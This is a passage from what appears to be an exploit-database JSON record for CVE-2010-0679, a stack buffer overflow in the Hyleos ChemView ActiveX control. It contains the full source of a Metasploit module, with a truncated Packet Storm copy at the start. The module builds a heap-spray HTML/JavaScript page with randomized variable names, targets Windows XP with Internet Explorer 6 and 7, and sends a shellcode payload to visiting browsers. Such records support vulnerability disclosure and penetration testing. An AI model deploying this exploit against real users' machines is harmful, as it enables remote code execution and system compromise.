rand_text_alpha(rand(100) + 1) \nj_nops = rand_text_alpha(rand(100) + 1) \nj_ret = rand_text_alpha(rand(100) + 1) \nj_headersize = rand_text_alpha(rand(100) + 1) \nj_slackspace = rand_text_alpha(rand(100) + 1) \nj_fillblock = rand_text_alpha(rand(100) + 1) \nj_block = rand_text_alpha(rand(100) + 1) \nj_memory = rand_text_alpha(rand(100) + 1) \nj_counter = rand_text_alpha(rand(30) + 2) \n \ncontent = %Q|<html> \n<object classid='clsid:#{clsid}' id='#{chemview}'></object> \n<script> \n#{j_shellcode}=unescape('#{shellcode}'); \n#{j_nops}=unescape('#{nops}'); \n#{j_headersize}=20; \n#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length; \nwhile(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops}; \n#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace}); \n#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace}); \nwhile(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock}; \n#{j_memory}=new Array(); \nfor(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode}; \n \nvar #{j_ret}=''; \nfor(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}'); \n#{chemview}.#{method}(#{j_ret}); \n</script> \n</html>| \n \n \nprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/92197/hyleos_chemviewx_activex.rb.txt"}], "metasploit": [{"lastseen": "2018-08-31T07:43:10", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods with an overly long first argument, an attacker can overrun a buffer and execute arbitrary code.", "reporter": "Rapid7", "published": "2010-07-27T02:25:15", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb", "type": "metasploit", "title": "Hyleos ChemView ActiveX Control Stack Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0679"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Good", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/HYLEOS_CHEMVIEWX_ACTIVEX", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking # heap spray :-/\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Hyleos ChemView ActiveX Control Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos\n ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods\n with an overly long first argument, an attacker can overrun a buffer and execute\n arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Paul Craig <paul.craig[at]security-assessment.com>', # original discovery/advisory\n 'Dz_attacker <dz_attacker[at]hotmail.fr>', # original file format module\n 'jduck' # converted HttpServer module\n ],\n 'References' =>\n [\n [ 'CVE', '2010-0679' ],\n [ 'OSVDB', '62276' ],\n [ 'URL', 'http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf' ],\n [ 'EDB', '11422' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0A0A0a0A, 'Offset' => 150 } ]\n ],\n 'DisclosureDate' => 'Feb 10 2010',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n\n clsid = \"C372350A-1D5A-44DC-A759-767FC553D96C\"\n progid = \"HyleosChemView.HLChemView\"\n\n methods = [ \"ReadMolFile\", \"SaveAsMolFile\" ]\n method = methods[rand(methods.length)]\n method = \"SaveAsMolFile\"\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # It may be possible to create a more robust exploit, however --\n # 1. The control's base address has been shown to vary (seen at 0x1c90000 and 0x1d90000)\n # 2. The buffer overflow does not appear to be entirely straight forward.\n\n # Encode the shellcode\n shellcode = Rex::Text.to_unescape(p.encoded, Rex::Arch.endian(target.arch))\n\n # Setup exploit buffers\n nops \t = Rex::Text.to_unescape([target.ret].pack('V'))\n ret \t = Rex::Text.uri_encode([target.ret].pack('L'))\n blocksize = 0x40000\n fillto = 300\n offset \t = target['Offset']\n\n # Randomize the javascript variable names\n chemview = rand_text_alpha(rand(100) + 1)\n j_shellcode = rand_text_alpha(rand(100) + 1)\n j_nops = rand_text_alpha(rand(100) + 1)\n j_ret = rand_text_alpha(rand(100) + 1)\n j_headersize = rand_text_alpha(rand(100) + 1)\n j_slackspace = rand_text_alpha(rand(100) + 1)\n j_fillblock = rand_text_alpha(rand(100) + 1)\n j_block = rand_text_alpha(rand(100) + 1)\n j_memory = rand_text_alpha(rand(100) + 1)\n j_counter = rand_text_alpha(rand(30) + 2)\n\n content = %Q|<html>\n<object classid='clsid:#{clsid}' id='#{chemview}'></object>\n<script>\n#{j_shellcode}=unescape('#{shellcode}');\n#{j_nops}=unescape('#{nops}');\n#{j_headersize}=20;\n#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;\nwhile(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};\n#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});\n#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});\nwhile(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};\n#{j_memory}=new Array();\nfor(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};\n\nvar #{j_ret}='';\nfor(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');\n#{chemview}.#{method}(#{j_ret});\n</script>\n</html>|\n\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb"}]}
